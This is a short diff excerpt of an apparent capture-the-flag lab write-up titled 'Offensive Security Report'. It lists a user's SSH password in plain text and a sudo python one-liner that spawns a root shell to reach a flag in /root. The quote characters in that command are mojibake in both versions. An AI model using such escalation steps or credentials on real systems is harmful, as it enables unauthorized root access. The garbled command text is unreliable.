Jtullis316/Offensive-Defensive-Network-Analysis/Offensive Security Report.md

 			- ssh steven password:pink84

 			- I ran a python command to login via root
-			- sudo python -c ëimport pty:pty.spawn(ì/bin/bashî)í
+			- sudo python -c ‚Äòimport pty:pty.spawn(‚Äú/bin/bash‚Äù)‚Äô

 			- I then went into the root directory I ran the list command and found flag 4 and then I viewed the flag
 			- cd /root